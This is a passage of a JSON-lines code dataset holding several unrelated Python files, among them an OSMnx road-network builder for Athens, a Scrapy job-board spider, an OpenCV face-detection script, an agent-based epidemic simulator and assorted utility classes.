settings.PROCESSED_GLOBAL )\n\n#test_data.drop( settings.ID_FIELD, inplace=True, axis=1 )\n\n# Train model and evaluate \nlogger.info('Train and Evaluate Model')\nmodel = ML_Model()\nmodel.load_model()\nids, prediction = model.predict_submission()\n\nsubmission_writer.create_submission( ids, prediction )","sub_path":"Submission_Pipeline.py","file_name":"Submission_Pipeline.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"600113525","text":"from datetime import datetime\n\n\nclass DataTypeUtils:\n\n @staticmethod\n def identify_data_type(element):\n if element is None:\n return None\n\n def test_float(elm):\n assert (\".\" in elm), \"does not contain decimal separator\"\n return float(elm)\n\n def test_bool(elm):\n trues = (\"true\", \"True\")\n falses = (\"false\", \"False\")\n\n if elm in trues:\n return True\n elif elm in falses:\n return False\n else:\n raise ValueError(\"is not either true or false\")\n\n def test_datetime(text):\n try:\n return dateutil.parser.parse(text)\n except:\n\n datetime_formats = (\n '%Y-%m-%dT%H: %M: %SZ', # strava\n )\n\n for fmt in datetime_formats:\n try:\n return datetime.strptime(text, fmt)\n except ValueError as e:\n pass\n\n raise ValueError('no valid date format found')\n\n # even though it is a string,\n # it might really be a int or float\n # so if string verify!!\n if isinstance(element, str):\n conv_functions = {\n float: test_float,\n int: lambda elm: int(elm),\n datetime: test_datetime,\n str: lambda elm: str(elm),\n bool: test_bool\n }\n\n order = [float, int, datetime, bool, str]\n\n for typ in order:\n try:\n # try the converting function of that type\n # if it doesnt fail, thats our type\n return conv_functions[typ](element)\n except (ValueError, AssertionError) as e:\n pass\n\n # if nothing else works, return as string\n return str(element)\n\n elif isinstance(element, (float, int, bool)):\n # otherwise just return the type of\n return element\n","sub_path":"MetaDataApi/metadata/utils/common_utils/data_type_utils.py","file_name":"data_type_utils.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"221972856","text":"\"\"\"\nCreated on Wed Oct 9 14:10:17 2019\n\n@author: Joachim Landtmeters\nBuilding the graph of Athens network by using osmnx package\n\"\"\"\n\nimport osmnx as ox\nimport matplotlib.pyplot as plt\nfrom matplotlib.lines import Line2D\nfrom matplotlib.collections import LineCollection\nimport networkx as nx\nimport pandas as pd\nimport geopandas as gpd\nfrom collections import Counter, OrderedDict\nfrom shapely.geometry import Point, LineString\nfrom operator import itemgetter\nfrom statistics import mean\nimport numpy as np\nfrom pylab import *\nimport pickle\nimport json\n\n# north, south, east, west = 37.9936, 37.9738, 23.7424, 23.7201 Coordinates for Athens region\nbb = 37.9936, 37.9738, 23.7424, 23.7201\n# custom filter to include pedestrian streets\nadj_filter = '[\"area\"!~\"yes\"][\"highway\"!~\"cycleway|footway|path|steps' \\\n'|track|corridor|elevator|escalator|proposed|construction|bridleway' \\\n'|abandoned|platform|raceway\"][\"motor_vehicle\"!~\"no\"][\"motorcar\"!~\"no\"]' \\\n'[\"access\"!~\"private\"][\"service\"!~\"parking|parking_aisle|private|emergency_access\"]'\n\n\nclass CreateNetwork:\n\n def __init__(self, bounding_box, network_type='drive_service', crs='epsg:4326', tags=None, simplify_strict=False,\n traffic_signals=True, custom_filter=None):\n # researched area (bounding box)\n self.bounding_box = bounding_box\n self.network_type = network_type\n self.custom_filter = custom_filter\n self.strict = simplify_strict\n self.tags = tags\n self.crs = crs\n if tags is None:\n self.tags = ['bridge', 'tunnel', 'oneway', 'lanes', 'ref', 'name',\n 'highway', 'busway:both', 'busway:left', 'busway:right',\n 'maxspeed', 'service', 'access', 'area',\n 'landuse', 'width', 'est_width', 'junction', 'surface']\n # download the road network from OSM\n ox.settings.useful_tags_path = self.tags\n if custom_filter:\n self.graph = ox.graph_from_bbox(self.bounding_box[0], self.bounding_box[1], self.bounding_box[2],\n self.bounding_box[3], custom_filter=self.custom_filter\n , simplify=self.strict)\n else:\n self.graph = ox.graph_from_bbox(self.bounding_box[0], self.bounding_box[1], self.bounding_box[2],\n self.bounding_box[3], network_type=self.network_type , simplify=self.strict)\n if not self.strict:\n self.graph = ox.simplify_graph(self.graph, strict=False)\n self.graph_latlon = ox.project_graph(self.graph, to_crs=self.crs)\n if traffic_signals:\n\n with open('export.geojson') as f: # Traffic signals in bounding box extracted via Overpass Turbo query\n ts = json.load(f)\n\n df_ts = pd.DataFrame(ts['features'])\n dict_traffic_signals = {'coordinates': [], 'highway': [], 'geometry': []}\n for ind, val in df_ts.iterrows():\n for i, j in enumerate(df_ts):\n if j == 'properties':\n dict_traffic_signals['highway'].append(val[j]['highway'])\n if j == 'geometry':\n dict_traffic_signals['coordinates'].append(val[j]['coordinates'])\n dict_traffic_signals['geometry'].append(Point(val[j]['coordinates'][0],\n val[j]['coordinates'][1]))\n self.traffic_signals = gpd.GeoDataFrame(dict_traffic_signals, geometry=dict_traffic_signals['geometry'])\n self.network_matrix = pd.DataFrame()\n\n def network_dfs(self, print_info=False):\n G = self.graph_latlon\n new_graph = ox.add_edge_bearings(G)\n edge_bus_lanes_left = list(new_graph.edges.data('busway:left', default=False))\n edge_bus_lanes_right = list(new_graph.edges.data('busway:right', default=False))\n left = [j[2] for i, j in enumerate(edge_bus_lanes_left)]\n right = [j[2] for i, j in enumerate(edge_bus_lanes_right)]\n n, e = ox.graph_to_gdfs(new_graph)\n e = e.assign(dbl_left=left)\n e = e.assign(dbl_right=right)\n e = e.drop(['busway:left', 'busway:right'], axis=1)\n dbl_bool = np.logical_and(e['dbl_left'].values, e['oneway'].values)\n gdf_val = e[['u', 'v', 'bearing']].values\n new_rows = []\n new_index = len(e)\n for row, val in e.iterrows():\n if dbl_bool[row]:\n if print_info:\n print(row)\n new_row = val.copy()\n new_row['u'] = int(gdf_val[row][1])\n new_row['v'] = int(gdf_val[row][0])\n new_row['lanes'] = 1\n new_row['bearing'] = gdf_val[row][2] - 180\n new_row['osmid'] = 'new_edge'\n new_row['geometry'] = [LineString([n['geometry'][gdf_val[row][1]],\n n['geometry'][gdf_val[row][0]]])]\n # print(dict(new_row), dict(val))\n new_row = gpd.GeoDataFrame(dict(new_row), index=[new_index])\n new_index += 1\n new_rows.append(new_row)\n if new_rows:\n new_rows = pd.concat(new_rows, axis=0)\n if print_info:\n print(new_rows)\n e = pd.concat([e, new_rows], axis=0)\n new_graph = ox.gdfs_to_graph(n, e)\n n, e = ox.graph_to_gdfs(new_graph)\n network_matrix = e.loc[:,\n ['u', 'v', 'oneway', 'osmid', 'highway', 'length', 'bearing', 'geometry', 'lanes',\n 'dbl_left', 'dbl_right']]\n network_nodes_small = n.loc[:, ['y', 'x']]\n else:\n network_matrix = e.loc[:,\n ['u', 'v', 'oneway', 'osmid', 'highway', 'length', 'bearing', 'geometry', 'lanes',\n 'dbl_left', 'dbl_right']]\n network_nodes_small = n.loc[:, ['y', 'x']]\n network_matrix = network_matrix.join(network_nodes_small, on='u')\n network_matrix = network_matrix.rename(columns={'u': 'N1', 'y': 'Lat1', 'x': 'Long1'})\n network_matrix = network_matrix.join(network_nodes_small, on='v')\n network_matrix = network_matrix.rename(columns={'v': 'N2', 'y': 'Lat2', 'x': 'Long2'})\n cols = ['osmid', 'N1', 'Lat1', 'Long1', 'N2', 'Lat2', 'Long2', 'length', 'lanes', 'oneway', 'bearing', 'highway'\n , 'dbl_left', 'dbl_right', 'geometry']\n network_matrix = network_matrix[cols] # rearranging columns (reader's convenience)\n network_matrix.reset_index(inplace=True) # From hereon the unique index of an edge is just its position in df\n self.graph_latlon = new_graph\n self.graph = ox.project_graph(self.graph_latlon)\n self.network_matrix = network_matrix\n return network_matrix, new_graph, new_rows\n\n def link_traffic_signals_to_edge(self):\n G = self.graph_latlon\n gdf_netw = self.network_matrix\n gdf_ts = self.traffic_signals\n lon = [j[0] for i, j in gdf_ts['coordinates'].iteritems()]\n lat = [j[1] for i, j in gdf_ts['coordinates'].iteritems()]\n nearest = ox.get_nearest_edges(G, lon, lat, method='balltree')\n nearest = [tuple(j) for i, j in enumerate(nearest)]\n gdf_ts['edge'] = nearest\n gdf_ts['N1'] = [j[0] for i, j in enumerate(nearest)]\n gdf_ts['N2'] = [j[1] for i, j in enumerate(nearest)]\n df_ts_e = pd.merge(gdf_netw[['N1', 'N2', 'geometry']], gdf_ts[['N1', 'N2']], how='inner',\n on=['N1', 'N2'])\n return df_ts_e\n\n def plot_dbl(self):\n network_matrix = self.network_matrix\n fig, ax = plt.subplots()\n network_matrix.plot(ax=ax, edgecolor='lightgrey')\n network_matrix[network_matrix['dbl_left'] == 'opposite_lane']. \\\n plot(ax=ax, edgecolor='r', linewidth=3, label='DBL: Contra flow')\n network_matrix[network_matrix['dbl_left'] == 'opposite_way']. \\\n plot(ax=ax, edgecolor='r', linewidth=3)\n network_matrix[network_matrix['dbl_right'] == 'lane'].plot(ax=ax, edgecolor='g', linewidth=3,\n label='DBL: With flow')\n network_matrix[(network_matrix['dbl_right'] == 'lane') & (network_matrix['dbl_left'] == 'opposite_lane')].plot(\n ax=ax, edgecolor='purple', linewidth=3, label='DBL: Both directions')\n network_matrix[(network_matrix['dbl_right'] == 'lane') & (network_matrix['dbl_left'] == 'opposite_way')].plot(\n ax=ax, edgecolor='purple', linewidth=3)\n ax.legend(loc='upper left')\n fig.suptitle('Dedicated bus lanes in Athens research area')\n plt.show()\n\n def plot_network_lanes(self):\n # Plot graph with number of lanes, colours for categorisation of roads\n G = self.graph_latlon\n edge_lanes = list(G.edges.data('lanes', default='0.5'))\n n_lanes = [x[2] for x in edge_lanes]\n for num, i in enumerate(n_lanes):\n t = type(i)\n if t is list:\n n_lanes[num] = [float(y) for y in n_lanes[num]]\n n_lanes[num] = mean(n_lanes[num])\n print(num)\n else:\n n_lanes[num] = float(n_lanes[num])\n n_lanes = [float(x) for x in n_lanes]\n ## Creating a pos_list based on longitude and latitude\n labels = nx.get_edge_attributes(G, 'lanes')\n colors = ['lightgrey', 'r', 'k', 'pink', 'blue', 'orange', 'g', 'm', 'c', 'darkred', 'pink']\n keys = list(Counter(n_lanes).keys())\n keys.sort()\n col_dict = OrderedDict(zip(keys, colors))\n print(col_dict)\n lane_colors = [col_dict[x] for x in n_lanes]\n fig, ax = ox.plot_graph(G, edge_linewidth=n_lanes, edge_color=lane_colors,\n show=False, close=False, node_size=1, fig_height=7, fig_width=7, margin=0)\n markersize = 6\n legend_elements = [0] * len(keys)\n for k, v in col_dict.items():\n idx = keys.index(k)\n if float(k) < 1:\n label = 'NaN'\n idx = 0\n elif float(k) == 1:\n label = ' 1 lane'\n idx = 1\n elif float(k) > int(k):\n label = f'{int(k)} to {int(k)+1} lanes (list)'\n else:\n label = f'{int(k)} lanes'\n legend_elements[idx] = Line2D([0], [0], marker='s', color=\"#061529\", label=label,\n markerfacecolor=col_dict[k], markersize=markersize)\n ax.legend(handles=legend_elements, frameon=True, framealpha=0.7, loc='lower left',\n fontsize=6)\n fig.suptitle('Athens network with colors and width of edges wrt lanes')\n plt.show()\n\n def save_graph_to_shp(self):\n network_nodes, _ = ox.graph_to_gdfs(self.graph_latlon)\n network_matrix_shp = self.network_matrix.copy()\n network_nodes_shp = network_nodes.copy()\n network_matrix_shp.crs = 'epsg:4326'\n network_nodes_shp.crs = 'epsg:4326'\n ox.save_load.save_gdf_shapefile(network_matrix_shp, filename=\"athens_network\", folder=\"athens\")\n ox.save_load.save_gdf_shapefile(network_nodes_shp, filename=\"athens_nodes\", folder=\"athens\")\n\n\n\n# Show network with strict and non-strict simplification\n# ox.plot_graph(research_area, show=False, close=False)\n# plt.title('Strict simplification')\n# ox.plot_graph(research_area_nonstrict, show=False, close=False)\n# plt.title('Non-strict simplification')\n\n# Projection to Lat-Long in WGS-84\n\n\n# Add edge bearings as attribute and build matrix with nodes of edges and their respective Lat-Long coordinates\n\n\"\"\" \nwith open('network_matrix_it2_nonstrict.pkl', 'wb') as g:\n pickle.dump(network_matrix, g)\n\nwith open('athens_network_it2_nonstrict.pkl', 'wb') as h:\n pickle.dump(athens_graph, h)\n\"\"\"","sub_path":"create_network.py","file_name":"create_network.py","file_ext":"py","file_size_in_byte":11962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"347063581","text":"from hashlib import sha1\nfrom datetime import datetime\n\nfrom sqlalchemy.dialects.postgresql import JSONB\nfrom werkzeug.datastructures import MultiDict\n\nfrom aleph.core import db\nfrom aleph.model.entity import Entity\nfrom aleph.model.validation import validate\nfrom aleph.model.common import SoftDeleteModel\n\n\ndef extract_query(q):\n \"\"\"Remove parts of the query which do not affect the result set.\"\"\"\n q = MultiDict(q)\n cleaned = MultiDict()\n for key in q.keys():\n values = q.getlist(key)\n if key == 'q':\n values = [v.strip() for v in values]\n if key.startswith('filter:') or key in ['entity', 'q']:\n for val in values:\n if not isinstance(val, (list, tuple, set)):\n val = [val]\n for v in val:\n if v is None:\n continue\n v = unicode(v).lower()\n if len(v):\n cleaned.add(key, v)\n return cleaned\n\n\ndef query_signature(q):\n \"\"\"Generate a SHA1 signature for the given query.\"\"\"\n q = extract_query(q)\n out = sha1()\n for field in q.keys():\n out.update('::' + field.encode('utf-8'))\n for value in set(sorted(q.getlist(field))):\n out.update('==' + value.encode('utf-8'))\n return out.hexdigest()\n\n\nclass Alert(db.Model, SoftDeleteModel):\n \"\"\"A subscription to notifications on a given query.\"\"\"\n\n __tablename__ = 'alert'\n\n id = db.Column(db.Integer, primary_key=True)\n role_id = db.Column(db.Integer, db.ForeignKey('role.id'), index=True)\n custom_label = db.Column(db.Unicode, nullable=True)\n signature = db.Column(db.Unicode)\n query = db.Column(JSONB)\n notified_at = db.Column(db.DateTime, nullable=True)\n\n @property\n def label(self):\n if self.custom_label is not None:\n return self.custom_label\n # This is weird. Should live somewhere else.\n fragments = []\n q = self.query.get('q')\n if q and len(q):\n fragments.append('matching \"%s\"' % ''.join(q))\n entities = self.query.get('entity')\n if entities and len(entities):\n try:\n entities = Entity.by_id_set(entities)\n sub_fragments = []\n for entity in entities.values():\n sub_fragments.append('\"%s\"' % entity.name)\n fragment = ' and '.join(sub_fragments)\n fragments.append('mentioning %s' % fragment)\n except:\n pass\n for key in self.query.keys():\n try:\n if not key.startswith('filter:'):\n continue\n _, field = key.split(':', 1)\n # TODO: source_id special handling?\n field = field.replace('_', ' ')\n value = '; '.join(self.query.get(key))\n fragments.append('filtered by %s: %s' % (field, value))\n except:\n pass\n if not len(fragments):\n return 'Everything'\n return 'Results %s' % ', '.join(fragments)\n\n def delete(self):\n self.deleted_at = datetime.utcnow()\n db.session.add(self)\n db.session.flush()\n\n def update(self):\n self.notified_at = datetime.utcnow()\n db.session.add(self)\n db.session.flush()\n\n @classmethod\n def by_id(cls, id, role=None):\n q = cls.all().filter_by(id=id)\n if role is not None:\n q = q.filter(cls.role_id == role.id)\n return q.first()\n\n @classmethod\n def by_role(cls, role):\n return cls.all().filter(cls.role_id == role.id)\n\n @classmethod\n def create(cls, data, role):\n validate(data, 'alert.json#')\n alert = cls()\n alert.role_id = role.id\n q = extract_query(data.get('query'))\n alert.query = {k: q.getlist(k) for k in q.keys()}\n alert.signature = query_signature(q)\n alert.custom_label = data.get('custom_label')\n alert.update()\n return alert\n\n @classmethod\n def exists(cls, query, role):\n q = cls.all_ids().filter(cls.role_id == role.id)\n q = q.filter(cls.signature == query_signature(query))\n return q.scalar()\n\n def __repr__(self):\n return '' % (self.id, self.query)\n\n def to_dict(self):\n return {\n 'id': self.id,\n 'label': self.label,\n 'custom_label': self.custom_label,\n 'signature': self.signature,\n 'role_id': self.role_id,\n 'notified_at': self.notified_at,\n 'query': self.query,\n 'created_at': self.created_at,\n 'updated_at': self.updated_at\n }\n","sub_path":"aleph/model/alert.py","file_name":"alert.py","file_ext":"py","file_size_in_byte":4704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"407658286","text":"import os, sys\nimport math\nimport datetime\n\n#\n# set_timecode\n# time : 0 - 24\n\ndef get_day(day):\n search_day = day\n if day == 'Today' :\n search_day = datetime.datetime.today().weekday() # 오늘 요일 (월-일 : 0-6)\n return search_day\n\n\ndef get_time(time):\n search_time = time\n if time == 'Now' :\n search_time = datetime.datetime.now().strftime('%H') # 현재 시간\n return search_time\n\n\ndef get_timecode(time_set):\n search_time = time_set\n\n wcode = datetime.datetime.now().strftime('%w')\n if int(wcode) == 0 : wcode = '7'\n\n now_time = datetime.datetime.now().strftime('%H') #현재 시간\n if search_time == 'now' : search_time = now_time\n\n if len(str(search_time)) == 1 : search_time = '0'+str(search_time)\n else : search_time = str(search_time)\n\n timecode = wcode+search_time\n\n return timecode\n\ndef check_item(item, name) :\n if ( name in item ) and (item[name] != None) :\n return True\n return False\n\n## Util Function\ndef get_distance_from_coordinates(x0, y0, x1, y1):\n x_ = float(x0)\n y_ = float(y0)\n _x = float(x1)\n _y = float(y1)\n\n p = 0.017453292519943295\n a = 0.5 - math.cos((_y - y_) * p)/2 + math.cos(y_ * p) * math.cos(_y * p) * (1 - math.cos((_x - x_) * p)) / 2\n return 12742 * math.asin(math.sqrt(a))\n\n\ndef progress_bar (iteration, total, prefix = '', suffix = '', decimals = 1, barLength = 100):\n\n formatStr = \"{0:.\" + str(decimals) + \"f}\"\n percent = formatStr.format(100 * (iteration / float(total)))\n filledLength = int(round(barLength * iteration / float(total)))\n\n bar = '#' * filledLength + '-' * (barLength - filledLength)\n\n sys.stdout.write('\\r%s |%s| %s%s %s' % (prefix, bar, percent, '%', suffix)),\n\n if iteration == total:\n sys.stdout.write('\\n')\n\n sys.stdout.flush()\n\n\nALLOWED_EXTENSIONS = set(['txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'])\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n","sub_path":"flask/app/util/CommonUtil.py","file_name":"CommonUtil.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"44053138","text":"\"\"\"\nTimesJobsAE spider created on the top of ATSSpider\n\nscrapy crawl timesjobs_ae -a mining_job_id=9999 -a iteration=1 -a extract=1 -a url=\"http://ae.timesjobs.com/\"\n\nSample URL:\n http://ae.timesjobs.com/\n\"\"\"\n\nfrom re import compile\nfrom scrapy.http import Request\nfrom scrapy.selector import Selector\nfrom urlparse import urljoin\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import ConvertDateString, NormalizedJoin, Prefix, Replace, ShrinkURL\n\npattern = {\n 'pager': compile(r'getNextPageResult\\((\\d+),(\\d+)\\)'),\n}\n\n\nclass TimesJobsAE(ATSSpider):\n\n name = 'timesjobs_ae'\n\n def parse(self, response):\n sel = Selector(response)\n # parse country\n for country_href in sel.xpath(\n '//section[@class=\"gulf-loc\"]/div/ul/li/a/@href'\n ).extract():\n yield Request(\n callback=self.parse_jobs_list,\n url=urljoin(response.url, country_href)\n )\n\n def parse_jobs_list(self, response):\n sel = Selector(response)\n\n for href in sel.xpath(\n '//div/ul[@class=\"joblist\"]/li[contains(@class, \"joblistli\")]//h2/a/@href'\n ).extract():\n yield Request(\n callback=self.parse_job_callback(),\n url=urljoin(response.url, href)\n )\n # pagination\n page_query = sel.xpath(\n '//div/div[@id=\"searchResultPagincationQuery\"]/text()'\n ).extract()\n next_page = sel.xpath(\n '//div[contains(@class, \"srp-pagination\")]//em[@class=\"active\"]/following-sibling::em[1]/a/@onclick'\n ).extract()\n if next_page:\n match = pattern['pager'].search(next_page[0])\n if match:\n next_page = '?from=submit&%(page_query)s&sequence=%(page_num)s&startPage=%(start)s' % {\n 'page_query': page_query[0],\n 'page_num': match.group(1),\n 'start': match.group(2),\n }\n yield Request(\n callback=self.parse_jobs_list,\n url=urljoin(response.url, next_page)\n )\n\n def parse_job(self, response):\n \"\"\"\n Extract all required information.\n \"\"\"\n sel = Selector(response)\n\n loader = BrightcorpItemLoader(selector=sel)\n\n loader.add_xpath(\n 'title',\n '//section[contains(@class, \"jd-preview\")]/header/h1/text()'\n )\n loader.add_xpath(\n 'location',\n '//ul/li/label[contains(text(), \"Location\")]/following-sibling::span[1]/text()'\n )\n loader.add_xpath(\n 'referencenumber',\n '//div[@class=\"posting-dtl\"]/span[@class=\"job-id\"]/text()',\n Replace('Job ID: '),\n Prefix('%s-' % self.name)\n )\n loader.add_xpath(\n 'date',\n '//div[@class=\"posting-dtl\"]/span[@class=\"pstd-on\"]/text()',\n Replace('Posted on: '),\n ConvertDateString('%d %b, %Y')\n )\n loader.add_xpath(\n 'company',\n '//section[contains(@class, \"jd-preview\")]/header/span[@class=\"jd-comp-name\"]/text()'\n )\n loader.add_xpath(\n 'company_description',\n '//section[@class=\"about-hiring-comp\"]'\n )\n loader.add_value('url', response.url, ShrinkURL(['txtKeywords']))\n loader.add_xpath(\n 'description',\n '//section[@class=\"job-discription\"]'\n )\n loader.add_xpath(\n 'baseSalary',\n '//ul/li/label[contains(text(), \"Salary\")]/following-sibling::span[1]/text()'\n )\n loader.add_xpath(\n 'experiencerequirements',\n '//ul/li/label[contains(text(), \"Experience\")]/following-sibling::span[1]/text()'\n )\n loader.add_xpath(\n 'jobcategory',\n '//ul/li/label[contains(text(), \"Job Function\")]/following-sibling::span[1]/text()'\n )\n loader.add_xpath(\n 'industry',\n '//ul/li/label[contains(text(), \"Industry\")]/following-sibling::span[1]/text()'\n )\n loader.add_xpath(\n 'educationrequirements',\n '//ul/li/label[contains(text(), \"Qualification:\")]/following-sibling::span[1]//text()',\n NormalizedJoin(', ')\n )\n loader.add_value('apply_url', response.url, ShrinkURL(['txtKeywords']))\n\n yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/timesjobs_ae.py","file_name":"timesjobs_ae.py","file_ext":"py","file_size_in_byte":4507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"597594070","text":"import cv2\r\nimport numpy as np\r\n\r\nface_Cascade= cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\r\n\r\ncap=cv2.VideoCapture(0)\r\n\r\n\r\nwhile True:\r\n ret,img = cap.read()\r\n gray= cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\r\n faces = face_Cascade.detectMultiScale(gray,scaleFactor=1.3,minNeighbors=5,minSize=(30,30))\r\n for(x,y,w,h) in faces:\r\n cv2.rectangle(img,(x,y),(x+w,y+h),(255,0,0),2)\r\n roi_gray = gray[y:y+h,x:x+w]\r\n roi_color = img[y:y+h,x:x+w]\r\n cv2.imshow('video',img)\r\n video_writer = cv2.VideoWriter(\"output.avi\", cv2.VideoWriter_fourcc(*'XVID'), 20, (680, 480))\r\n\r\n k= cv2.waitKey(30) & 0xff\r\n if k== 27:\r\n break\r\n\r\nwhile (cap.isOpened()):\r\n ret, frame = cap.read()\r\n if ret:\r\n video_writer.write(frame)\r\n cv2.imshow('Video Stream', frame)\r\n else:\r\n break\r\ncap.release()\r\ncv2.destroyAllWindows()\r\n","sub_path":"Python.py","file_name":"Python.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"143717698","text":"import random\nimport copy\nimport numpy as np\nimport ReadFile\n\nclass Simulate():\n\tdef __init__(self,config_obj,model,policy_list,event_restriction_fn,agents_obj,locations_obj):\n\t\tself.agents_obj=agents_obj\n\t\tself.locations_obj=locations_obj\n\t\tself.model=model\n\t\tself.policy_list=policy_list\n\t\tself.event_restriction_fn=event_restriction_fn\n\t\tself.config_obj=config_obj\n\n\tdef onStartSimulation(self):\n\n\t\t#Intitialize state list\n\t\tself.state_list={}\n\t\tself.state_history={}\n\t\tfor state in self.model.individual_state_types:\n\t\t\tself.state_list[state]=[]\n\t\t\tself.state_history[state]=[]\n\n\t\t#Initialize states\n\t\tself.model.initalize_states(self.agents_obj.agents)\n\n\t\t#Reset Policies\n\t\tfor policy in self.policy_list:\n\t\t\tpolicy.reset()\n\n\t\t#Update State list\n\t\tfor agent in self.agents_obj.agents.values():\n\t\t\tself.state_list[agent.state].append(agent.index)\n\n\t\t#Store state list\n\t\tself.store_state()\n\n\tdef onStartTimeStep(self, interactionFiles_listOfList, eventFiles_listOfList, current_time_step):\n\t\tself.current_time_step=current_time_step\n\n\t\tfor agent in self.agents_obj.agents.values():\n\t\t\tagent.new_time_step()\n\n\t\tfor location in self.locations_obj.locations.values():\n\t\t\tlocation.new_time_step()\n\n\t\t# Initialize filenames\n\t\tinteractions_filename = events_filename = None\n\n\t\t# Load interactions\n\t\tfor interactionFiles_list in interactionFiles_listOfList:\n\t\t\tif interactionFiles_list != []:\n\t\t\t\tinteractions_filename = interactionFiles_list[current_time_step % len(interactionFiles_list)]\n\t\t\t\tReadFile.ReadInteractions(interactions_filename,self.config_obj,self.agents_obj)\n\n\t\t# Load Events\n\t\tfor eventFiles_list in eventFiles_listOfList:\n\t\t\tif eventFiles_list != []:\n\t\t\t\tevents_filename = eventFiles_list[current_time_step % len(eventFiles_list)]\n\t\t\t\tReadFile.ReadEvents(events_filename,self.config_obj,self.locations_obj, self.agents_obj)\n\n\t\t#Enact policies by updating agent and location states.\n\t\tfor policy in self.policy_list:\n\t\t\tpolicy.enact_policy(self.current_time_step, self.agents_obj.agents.values(), self.locations_obj.locations.values(), self.model)\n\n\t\tif events_filename != None:\n\t\t\t#Update event info to agents from location\n\t\t\tfor location in self.locations_obj.locations.values():\n\t\t\t\tif not location.lock_down_state:\n\t\t\t\t\tfor event_info in location.events:\n\t\t\t\t\t\tself.model.update_event_infection(event_info, location, self.agents_obj, self.current_time_step, self.event_restriction_fn)\n\n\tdef handleTimeStepForAllAgents(self):\n\t\t#Too ensure concurrency we update agent.next_state in method handleTimeStepAsAgent\n\t\t#After every agent has updated next_state we update states of all agents in method handleTimeStep()\n\n\t\tfor agent in self.agents_obj.agents.values():\n\t\t\tself.handleTimeStepAsAgent(agent)\n\n\t\tfor agent in self.agents_obj.agents.values():\n\t\t\tself.convert_state(agent)\n\n\tdef handleTimeStepAsAgent(self,agent):\n\t\t#Too ensure concurrency we update agent.next_state in method handleTimeStepAsAgent\n\t\t#After every agent has updated next_state we update states of all agents in method handleTimeStep()\n\n\n\t\t#Finding next_state\n\t\tagent.set_next_state(self.model.find_next_state(agent,self.agents_obj.agents,self.current_time_step))\n\n\tdef endTimeStep(self):\n\t\tself.store_state()\n\n\tdef endSimulation(self):\n\t\treturn self.state_history\n\n\tdef store_state(self):\n\t\tfor state in self.state_history.keys():\n\t\t\tself.state_history[state].append(len(self.state_list[state]))\n\n\tdef convert_state(self,agent):\n\t\tself.state_list[agent.state].remove(agent.index)\n\t\tagent.update_state()\n\t\tself.state_list[agent.state].append(agent.index)\n","sub_path":"Simulator/Simulate.py","file_name":"Simulate.py","file_ext":"py","file_size_in_byte":3542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"201544061","text":"#! /Users/xiaotongli/anaconda3/bin/python\n# -*- coding: utf-8 -*-\n# @Time : 10/12/18 6:03 PM\n# @Author : Xiaotong Li\n# @School : University of California, Santa Cruz\n# @FileName: intersect.py\n# @Software: PyCharm\n\n\nclass Solution:\n def intersect(self, nums1, nums2):\n \"\"\"\n :type nums1: List[int]\n :type nums2: List[int]\n :rtype: List[int]\n \"\"\"\n counts = {}\n res = []\n\n for num in nums1:\n counts[num] = counts.get(num, 0) + 1\n\n for num in nums2:\n if num in counts and counts[num] > 0:\n res.append(num)\n counts[num] -= 1\n\n return res\n","sub_path":"Python/HashTable/intersect.py","file_name":"intersect.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"12666754","text":"#!/usr/bin/python\n\"\"\"\nBaseModel module\n\"\"\"\n\nimport models\nimport uuid\nfrom datetime import datetime\n\n\nclass BaseModel:\n \"\"\"\n BaseModel class\n defines all common attributes/methods for other classes\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"\n Init method\n \"\"\"\n format_time = \"%Y-%m-%dT%H:%M:%S.%f\"\n self.id = str(uuid.uuid4())\n self.created_at = datetime.now()\n self.updated_at = datetime.now()\n if kwargs:\n for k, v in kwargs.items():\n if k == \"created_at\" or k == \"updated_at\":\n # to convert string into a datetime obj\n v = datetime.strptime(v, format_time)\n if k != \"__class__\":\n setattr(self, k, v)\n else:\n models.storage.new(self)\n\n def __str__(self):\n \"\"\"\n __str__: should print: [] () \n \"\"\"\n return \"[{}] ({}) {}\".format(self.__class__.__name__,\n self.id, self.__dict__)\n\n def save(self):\n \"\"\"\n updates the public instance attribute\n updated_at with the current datetime\n \"\"\"\n self.updated_at = datetime.now()\n models.storage.save()\n\n def to_dict(self):\n \"\"\"\n returns a dictionary containing all\n keys/values of __dict__ of the instance\n \"\"\"\n\n dic = dict(**self.__dict__)\n dic['__class__'] = str(type(self).__name__)\n dic['created_at'] = self.created_at.isoformat()\n dic['updated_at'] = self.updated_at.isoformat()\n return (dic)\n","sub_path":"models/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"512404770","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport math\nimport sys\nimport tempfile\nimport time\nimport tensorflow as tf\nimport PuzzleSet\nimport vgg19\n\n\n# TODO:\n# 1) persist the model using SavedModel during training\n# 2) use QueueRunner and FileReader to asynchronously load samples\n# 3) GPU suport on RHEL, VRAM 